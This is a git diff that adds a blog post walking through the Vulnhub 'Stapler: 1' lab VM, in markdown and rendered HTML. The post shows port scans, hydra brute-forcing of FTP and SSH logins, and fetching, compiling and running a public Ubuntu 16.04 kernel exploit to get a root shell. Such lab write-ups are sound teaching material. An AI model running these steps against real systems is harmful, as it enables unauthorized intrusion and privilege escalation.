diff --git a/_posts/2016-06-19-stapler_walkthough.md b/_posts/2016-06-19-stapler_walkthough.md new file mode 100644 index 0000000..636726d --- /dev/null +++ b/_posts/2016-06-19-stapler_walkthough.md @@ -0,0 +1,291 @@ +--- +title: "Stapler: 1 Vulnhub Walkthrough" +layout: post +category: writeup +tags: [vulnhub, hacking] +excerpt: "Walkthrough for Stapler: 1 VM on Vulnhub" +--- + +# Figure out the IP + +``` +paul@archyoga [05:31:55] [~] +-> % nmap -sn 192.168.1.0/24 + +Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-19 17:32 EDT +. +. +. +Nmap scan report for red (192.168.1.135) +Host is up (0.0030s latency). +. +. +. +Nmap done: 256 IP addresses (16 hosts up) scanned in 3.59 seconds +``` + +Let's see what's there: + +``` +paul@archyoga [05:33:59] [~] +-> % nmap -Pn 192.168.1.135 + +Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-19 17:34 EDT +Nmap scan report for red (192.168.1.135) +Host is up (0.011s latency). +Not shown: 992 filtered ports +PORT STATE SERVICE +20/tcp closed ftp-data +21/tcp open ftp +22/tcp open ssh +53/tcp open domain +80/tcp open http +139/tcp open netbios-ssn +666/tcp open doom +3306/tcp open mysql + +Nmap done: 1 IP address (1 host up) scanned in 4.86 seconds +``` + +# Login to ftp + +``` +paul@archyoga [05:34:57] [~] +-> % ftp +ftp> open 192.168.1.135 +Connected to 192.168.1.135. +220- +220-|-----------------------------------------------------------------------------------------| +220-| Harry, make sure to update the banner when you get a chance to show who has access here | +220-|-----------------------------------------------------------------------------------------| +220- +220 +Name (192.168.1.135:paul): anonymous +331 Please specify the password. +Password: +230 Login successful. +Remote system type is UNIX. +Using binary mode to transfer files. +ftp> ls +200 PORT command successful. Consider using PASV. +150 Here comes the directory listing. +-rw-r--r-- 1 0 0 107 Jun 03 23:06 note +226 Directory send OK. +ftp> get note +200 PORT command successful. Consider using PASV. +150 Opening BINARY mode data connection for note (107 bytes). +226 Transfer complete. +107 bytes received in 5.1e-05 seconds (2 Mbytes/s) +ftp> 221 Goodbye. + +paul@archyoga [05:36:17] [~] +-> % cat note +Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John. +``` + +Turns out it is, and inside is a file named ```note``` which names an ftp user: ```elly```. +I used hydra to test some common passwords and that worked out: + +``` +paul@archyoga [05:39:21] [~] +-> % hydra -l elly -e nsr 92.168.1.135 ftp +Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. + +Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-19 17:39:36 +[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort... +[DATA] max 3 tasks per 1 server, overall 64 tasks, 3 login tries (l:1/p:3), ~0 tries per task +[DATA] attacking service ftp on port 21 +[21][ftp] host: 192.168.1.135 login: elly password: ylle +1 of 1 target successfully completed, 1 valid password found +Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-19 17:39:50 +``` + +Now we can login to ftp as elly using the password ```ylle```. On the ftp server there's a passwd file, so I can use that as a user list to test against: + +``` +paul@archyoga [05:42:07] [~] +-> % ftp +ftp> open 192.168.1.135 +Connected to 192.168.1.135. +220- +220-|-----------------------------------------------------------------------------------------| +220-| Harry, make sure to update the banner when you get a chance to show who has access here | +220-|-----------------------------------------------------------------------------------------| +220- +220 +Name (192.168.1.135:paul): elly +331 Please specify the password. +Password: +230 Login successful. +Remote system type is UNIX. +Using binary mode to transfer files. +ftp> ls +200 PORT command successful. Consider using PASV. +150 Here comes the directory listing. +. +. +. +-rw-r--r-- 1 0 0 2908 Jun 04 20:14 passwd +. +. +. +ftp> get passwd +200 PORT command successful. Consider using PASV. +150 Opening BINARY mode data connection for passwd (2908 bytes). +226 Transfer complete. +2908 bytes received in 9.9e-05 seconds (28 Mbytes/s) +ftp> 221 Goodbye. +``` + +# Login over ssh & exploit + +Using hydra again I discovered a login for ssh from the passwd file: + +``` +paul@archyoga [05:42:36] [~] +-> % awk -F':' '{ print $1}' passwd > users + + +-> % hydra -e nsr -L ./users 192.168.1.135 ssh +Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. + +Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-19 17:44:42 +[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 +[DATA] max 16 tasks per 1 server, overall 64 tasks, 183 login tries (l:61/p:3), ~0 tries per task +[DATA] attacking service ssh on port 22 +[22][ssh] host: 192.168.1.135 login: SHayslett password: SHayslett +``` + +Then once I determined the release I went over to [http://exploit-db.com](http://exploit-db.com) and searched "ubuntu 16.04" and found this: https://www.exploit-db.com/exploits/39772/ + +Now for the exploit: + +``` +paul@archyoga [05:50:44] [~] +-> % ssh SHayslett@192.168.1.135 +----------------------------------------------------------------- +~ Barry, don't forget to put a message here ~ +----------------------------------------------------------------- +SHayslett@192.168.1.135's password: +Welcome back! + + +SHayslett@red:~$ lsb_release -a +No LSB modules are available. +Distributor ID: Ubuntu +Description: Ubuntu 16.04 LTS +Release: 16.04 +Codename: xenial +SHayslett@red:~$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip +--2016-06-19 18:49:36-- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip +Resolving github.com (github.com)... 192.30.252.130 +Connecting to github.com (github.com)|192.30.252.130|:443... connected. +HTTP request sent, awaiting response... 302 Found +Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip [following] +--2016-06-19 18:49:36-- https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip +Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 23.235.44.133 +Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|23.235.44.133|:443... connected. +HTTP request sent, awaiting response... 200 OK +Length: 7115 (6.9K) [application/zip] +Saving to: ‘39772.zip’ + +39772.zip 100%[=====================================================================================================================================================================================================>] 6.95K --.-KB/s in 0s + +2016-06-19 18:49:37 (94.2 MB/s) - ‘39772.zip’ saved [7115/7115] + +SHayslett@red:~/tmp$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/splo +--2016-06-19 18:52:05-- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploi +Resolving github.com (github.com)... 192.30.252.128 +Connecting to github.com (github.com)|192.30.252.128|:443... connected. +HTTP request sent, awaiting response... 302 Found +Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/3 +--2016-06-19 18:52:05-- https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/m +Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 23.235.46.133 +Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|23.235.46.133|:443... connected. +HTTP request sent, awaiting response... 200 OK +Length: 7115 (6.9K) [application/zip] +Saving to: ‘39772.zip’ + +39772.zip 100%[======================= + +2016-06-19 18:52:05 (4.75 MB/s) - ‘39772.zip’ saved [7115/7115] + +SHayslett@red:~/tmp$ unzip * +Archive: 39772.zip + creating: 39772/ +. +. +. +SHayslett@red:~/tmp$ cd *2 +SHayslett@red:~/tmp/39772$ ls +crasher.tar exploit.tar +SHayslett@red:~/tmp/39772$ tar xf exploit.tar +SHayslett@red:~/tmp/39772$ ls +crasher.tar ebpf_mapfd_doubleput_exploit exploit.tar +SHayslett@red:~/tmp/39772$ cd e* +SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls +compile.sh doubleput.c hello.c suidhelper.c +SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh +doubleput.c: In function ‘make_setuid’: +doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] + .insns = (__aligned_u64) insns, + ^ +doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] + .license = (__aligned_u64)"" + ^ +SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls +compile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.c +SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput +starting writev +woohoo, got pointer reuse +writev returned successfully. if this worked, you'll have a root shell in <=60 seconds. +suid file detected, launching rootshell... +we have root privs now... +root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root +SHayslett@red:~/tmp/39772$ cd e* +SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls +compile.sh doubleput.c hello.c suidhelper.c +SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh +doubleput.c: In function ‘make_setuid’: +doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] + .insns = (__aligned_u64) insns, + ^ +doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] + .license = (__aligned_u64)"" + ^ +SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls +compile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.c +SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput +starting writev +woohoo, got pointer reuse +writev returned successfully. if this worked, you'll have a root shell in <=60 seconds. +suid file detected, launching rootshell... +we have root privs now... +root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit# +``` + +This part might be a little hard to read, but all I did was follow the instructions from the exploit page pretty much word for word: https://www.exploit-db.com/exploits/39772/. + +Next, the flag! + +``` +root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root +root@red:/root# ls +fix-wordpress.sh flag.txt issue python.sh wordpress.sql +root@red:/root# cat flag.txt +~~~~~~~~~~<(Congratulations)>~~~~~~~~~~ + .-'''''-. + |'-----'| + |-.....-| + | | + | | + _,._ | | + __.o` o`"-. | | + .-O o `"-.o O )_,._ | | +( o O o )--.-"`O o"-.`'-----'` + '--------' ( o O o) + `----------` +b6b545dc11b7a270f4bad23432190c75162c4a2b +``` + +Woo! diff --git a/_site/category/index.html b/_site/category/index.html index 8ebaae9..3905a06 100644 --- a/_site/category/index.html +++ b/_site/category/index.html @@ -122,7 +122,7 @@
  • writeup - 1 + 2
    • @@ -152,6 +152,35 @@ +
    +
    +

    19

    +

    Jun/2016

    +

    writeup

    +
    + +
    +

    Stapler: 1 Vulnhub Walkthrough

    + +
    +
    +

    + Walkthrough for Stapler: 1 VM on Vulnhub +

    +
    + + +
    + + + +

    14

    diff --git a/_site/index.html b/_site/index.html index 91e7629..b477c4e 100644 --- a/_site/index.html +++ b/_site/index.html @@ -120,6 +120,32 @@ + +

    14

    diff --git a/_site/sitemap.txt b/_site/sitemap.txt index 92f05eb..d7d8f5d 100644 --- a/_site/sitemap.txt +++ b/_site/sitemap.txt @@ -1,3 +1,4 @@ +http://paul.walko.org//writeup/stapler_walkthough http://paul.walko.org//writeup/nebula_exploit_exercises diff --git a/_site/sitemap.xml b/_site/sitemap.xml index c094d4e..16abb4f 100644 --- a/_site/sitemap.xml +++ b/_site/sitemap.xml @@ -4,9 +4,15 @@ xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd"> + + http://paul.walko.org//writeup/stapler_walkthough + 2016-06-19T18:13:08-04:00 + weekly + + http://paul.walko.org//writeup/nebula_exploit_exercises - 2016-06-19T02:35:49-04:00 + 2016-06-19T18:13:08-04:00 weekly diff --git a/_site/stapler_walkthough.html b/_site/stapler_walkthough.html new file mode 100644 index 0000000..8b13789 --- /dev/null +++ b/_site/stapler_walkthough.html @@ -0,0 +1 @@ + diff --git a/_site/stylesheets/base.css b/_site/stylesheets/base.css index 27d33a8..4643a78 100755 --- a/_site/stylesheets/base.css +++ b/_site/stylesheets/base.css @@ -211,6 +211,7 @@ pre, samp { font-family: monospace, monospace; font-size: 1em; + background-color:rgba(192,192,192,0.6); } /* Forms diff --git a/_site/tag/index.html b/_site/tag/index.html index c785355..117e67d 100644 --- a/_site/tag/index.html +++ b/_site/tag/index.html @@ -141,6 +141,15 @@ hacking + 2 + + + + +
  • + + + vulnhub 1
    • @@ -303,6 +312,35 @@ + + + + +

    14

    @@ -336,6 +374,68 @@ +
    + + +
    + + + + + + +
    + + + + + + + + + + + + + + + + + + + + + + + + + + +
    diff --git a/_site/writeup/Http_headers_and_PHP_header()_function.html b/_site/writeup/Http_headers_and_PHP_header()_function.html deleted file mode 100644 index 2108af9..0000000 --- a/_site/writeup/Http_headers_and_PHP_header()_function.html +++ /dev/null @@ -1,155 +0,0 @@ - - - - - - - - - - -Test post; Please Ignore - - - - - - - - - - - - - - - - - - - -
    -
    -
    -
    -

    Test post; Please Ignore

    - -
      - -
    • exploit-exercises
      • - -
    • nebula
      • - -
    • hacking
      • - -
    - -

    posted on 26 Sep 2015 under category writeup

    - -
    - -

    Really through, ignore this post.

    - -
    - -
    -
    - -
    - - - -
    -
    - - - - - - - - - - diff --git a/_site/writeup/stapler_walkthough.html b/_site/writeup/stapler_walkthough.html new file mode 100644 index 0000000..4e4c5cd --- /dev/null +++ b/_site/writeup/stapler_walkthough.html @@ -0,0 +1,475 @@ + + + + + + + + + + + + + +Stapler: 1 Vulnhub Walkthrough + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    +
    +
    +
    +

    Stapler: 1 Vulnhub Walkthrough

    + +
      + +
    • vulnhub
      • + +
    • hacking
      • + +
    + +

    posted on 19 Jun 2016 under category writeup

    + +
    + +

    Figure out the IP

    + +
    paul@archyoga [05:31:55] [~]
+-> % nmap -sn 192.168.1.0/24
+
+Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-19 17:32 EDT
+.
+.
+.
+Nmap scan report for red (192.168.1.135)
+Host is up (0.0030s latency).
+.
+.
+.
+Nmap done: 256 IP addresses (16 hosts up) scanned in 3.59 seconds
+
    +
    + +

    Let’s see what’s there:

    + +
    paul@archyoga [05:33:59] [~]
+-> % nmap -Pn 192.168.1.135
+
+Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-19 17:34 EDT
+Nmap scan report for red (192.168.1.135)
+Host is up (0.011s latency).
+Not shown: 992 filtered ports
+PORT     STATE  SERVICE
+20/tcp   closed ftp-data
+21/tcp   open   ftp
+22/tcp   open   ssh
+53/tcp   open   domain
+80/tcp   open   http
+139/tcp  open   netbios-ssn
+666/tcp  open   doom
+3306/tcp open   mysql
+
+Nmap done: 1 IP address (1 host up) scanned in 4.86 seconds
+
    +
    + +

    Login to ftp

    + +
    paul@archyoga [05:34:57] [~]
+-> % ftp
+ftp> open 192.168.1.135
+Connected to 192.168.1.135.
+220-
+220-|-----------------------------------------------------------------------------------------|
+220-| Harry, make sure to update the banner when you get a chance to show who has access here |
+220-|-----------------------------------------------------------------------------------------|
+220-
+220
+Name (192.168.1.135:paul): anonymous
+331 Please specify the password.
+Password:
+230 Login successful.
+Remote system type is UNIX.
+Using binary mode to transfer files.
+ftp> ls
+200 PORT command successful. Consider using PASV.
+150 Here comes the directory listing.
+-rw-r--r--    1 0        0             107 Jun 03 23:06 note
+226 Directory send OK.
+ftp> get note
+200 PORT command successful. Consider using PASV.
+150 Opening BINARY mode data connection for note (107 bytes).
+226 Transfer complete.
+107 bytes received in 5.1e-05 seconds (2 Mbytes/s)
+ftp> 221 Goodbye.
+
+paul@archyoga [05:36:17] [~]
+-> % cat note
+Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
+
    +
    + +

    Turns out it is, and inside is a file named note which names an ftp user: elly. +I used hydra to test some common passwords and that worked out:

    + +
    paul@archyoga [05:39:21] [~]
+-> % hydra -l elly -e nsr 92.168.1.135 ftp
+Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
+
+Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-19 17:39:36
+[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
+[DATA] max 3 tasks per 1 server, overall 64 tasks, 3 login tries (l:1/p:3), ~0 tries per task
+[DATA] attacking service ftp on port 21
+[21][ftp] host: 192.168.1.135   login: elly   password: ylle
+1 of 1 target successfully completed, 1 valid password found
+Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-19 17:39:50
+
    +
    + +

    Now we can login to ftp as elly using the password ylle. On the ftp server there’s a passwd file, so I can use that as a user list to test against:

    + +
    paul@archyoga [05:42:07] [~]
+-> % ftp                                     
+ftp> open 192.168.1.135
+Connected to 192.168.1.135.
+220-
+220-|-----------------------------------------------------------------------------------------|
+220-| Harry, make sure to update the banner when you get a chance to show who has access here |
+220-|-----------------------------------------------------------------------------------------|
+220-
+220
+Name (192.168.1.135:paul): elly
+331 Please specify the password.
+Password:
+230 Login successful.
+Remote system type is UNIX.
+Using binary mode to transfer files.
+ftp> ls
+200 PORT command successful. Consider using PASV.
+150 Here comes the directory listing.
+.
+.
+.
+-rw-r--r--    1 0        0            2908 Jun 04 20:14 passwd
+.
+.
+.
+ftp> get passwd
+200 PORT command successful. Consider using PASV.
+150 Opening BINARY mode data connection for passwd (2908 bytes).
+226 Transfer complete.
+2908 bytes received in 9.9e-05 seconds (28 Mbytes/s)
+ftp> 221 Goodbye.
+
    +
    + +

    Login over ssh & exploit

    + +

    Using hydra again I discovered a login for ssh from the passwd file:

    + +
    paul@archyoga [05:42:36] [~]
+-> % awk -F':' '{ print $1}' passwd > users
+
+
+-> % hydra -e nsr -L ./users 192.168.1.135 ssh  
+Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
+
+Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-19 17:44:42
+[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
+[DATA] max 16 tasks per 1 server, overall 64 tasks, 183 login tries (l:61/p:3), ~0 tries per task
+[DATA] attacking service ssh on port 22
+[22][ssh] host: 192.168.1.135   login: SHayslett   password: SHayslett
+
    +
    + +

    Then once I determined the release I went over to http://exploit-db.com and searched “ubuntu 16.04” and found this: https://www.exploit-db.com/exploits/39772/

    + +

    Now for the exploit:

    + +
    paul@archyoga [05:50:44] [~]
+-> % ssh SHayslett@192.168.1.135
+-----------------------------------------------------------------
+~          Barry, don't forget to put a message here           ~
+-----------------------------------------------------------------
+SHayslett@192.168.1.135's password:
+Welcome back!
+
+
+SHayslett@red:~$ lsb_release -a
+No LSB modules are available.
+Distributor ID: Ubuntu
+Description:    Ubuntu 16.04 LTS
+Release:        16.04
+Codename:       xenial
+SHayslett@red:~$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
+--2016-06-19 18:49:36--  https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
+Resolving github.com (github.com)... 192.30.252.130
+Connecting to github.com (github.com)|192.30.252.130|:443... connected.
+HTTP request sent, awaiting response... 302 Found
+Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip [following]
+--2016-06-19 18:49:36--  https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip
+Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 23.235.44.133
+Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|23.235.44.133|:443... connected.
+HTTP request sent, awaiting response... 200 OK
+Length: 7115 (6.9K) [application/zip]
+Saving to: ‘39772.zip’
+
+39772.zip                                                                     100%[=====================================================================================================================================================================================================>]   6.95K  --.-KB/s    in 0s      
+
+2016-06-19 18:49:37 (94.2 MB/s) - ‘39772.zip’ saved [7115/7115]
+
+SHayslett@red:~/tmp$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/splo
+--2016-06-19 18:52:05--  https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploi
+Resolving github.com (github.com)... 192.30.252.128
+Connecting to github.com (github.com)|192.30.252.128|:443... connected.
+HTTP request sent, awaiting response... 302 Found
+Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/3
+--2016-06-19 18:52:05--  https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/m
+Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 23.235.46.133
+Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|23.235.46.133|:443... connected.
+HTTP request sent, awaiting response... 200 OK
+Length: 7115 (6.9K) [application/zip]
+Saving to: ‘39772.zip’
+
+39772.zip                                                                       100%[=======================
+
+2016-06-19 18:52:05 (4.75 MB/s) - ‘39772.zip’ saved [7115/7115]
+
+SHayslett@red:~/tmp$ unzip *
+Archive:  39772.zip
+   creating: 39772/
+.
+.
+.
+SHayslett@red:~/tmp$ cd *2
+SHayslett@red:~/tmp/39772$ ls
+crasher.tar  exploit.tar
+SHayslett@red:~/tmp/39772$ tar xf exploit.tar
+SHayslett@red:~/tmp/39772$ ls
+crasher.tar  ebpf_mapfd_doubleput_exploit  exploit.tar
+SHayslett@red:~/tmp/39772$ cd e*
+SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
+compile.sh  doubleput.c  hello.c  suidhelper.c
+SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
+doubleput.c: In function ‘make_setuid’:
+doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
+    .insns = (__aligned_u64) insns,
+             ^
+doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
+    .license = (__aligned_u64)""
+               ^
+SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
+compile.sh  doubleput  doubleput.c  hello  hello.c  suidhelper  suidhelper.c
+SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
+starting writev
+woohoo, got pointer reuse
+writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
+suid file detected, launching rootshell...
+we have root privs now...
+root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root
+SHayslett@red:~/tmp/39772$ cd e*
+SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
+compile.sh  doubleput.c  hello.c  suidhelper.c
+SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
+doubleput.c: In function ‘make_setuid’:
+doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
+    .insns = (__aligned_u64) insns,
+             ^
+doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
+    .license = (__aligned_u64)""
+               ^
+SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
+compile.sh  doubleput  doubleput.c  hello  hello.c  suidhelper  suidhelper.c
+SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
+starting writev
+woohoo, got pointer reuse
+writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
+suid file detected, launching rootshell...
+we have root privs now...
+root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit#
+
    +
    + +

    This part might be a little hard to read, but all I did was follow the instructions from the exploit page pretty much word for word: https://www.exploit-db.com/exploits/39772/.

    + +

    Next, the flag!

    + +
    root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root
+root@red:/root# ls
+fix-wordpress.sh  flag.txt  issue  python.sh  wordpress.sql
+root@red:/root# cat flag.txt
+~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
+                          .-'''''-.
+                          |'-----'|
+                          |-.....-|
+                          |       |
+                          |       |
+         _,._             |       |
+    __.o`   o`"-.         |       |
+ .-O o `"-.o   O )_,._    |       |
+( o   O  o )--.-"`O   o"-.`'-----'`
+ '--------'  (   o  O    o)  
+              `----------`
+b6b545dc11b7a270f4bad23432190c75162c4a2b
+
    +
    + +

    Woo!

    + +
    + +
    +
    + +
    + + + +
    +
    + + + + + + + + + + diff --git a/_site/writeup/test_post.html b/_site/writeup/test_post.html deleted file mode 100644 index b9821e4..0000000 --- a/_site/writeup/test_post.html +++ /dev/null @@ -1,183 +0,0 @@ - - - - - - - - - - - - -Test post; Please Ignore - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    -
    -
    -
    -

    Test post; Please Ignore

    - -
      - -
    • exploit-exercises
      • - -
    • nebula
      • - -
    • hacking
      • - -
    - -

    posted on 26 Sep 2015 under category writeup

    - -
    - -

    Really through, ignore this post.

    - -
    - -
    -
    - -
    - - - -
    -
    - - - - - - - - - - diff --git a/stylesheets/base.css b/stylesheets/base.css index 27d33a8..4643a78 100755 --- a/stylesheets/base.css +++ b/stylesheets/base.css @@ -211,6 +211,7 @@ pre, samp { font-family: monospace, monospace; font-size: 1em; + background-color:rgba(192,192,192,0.6); } /* Forms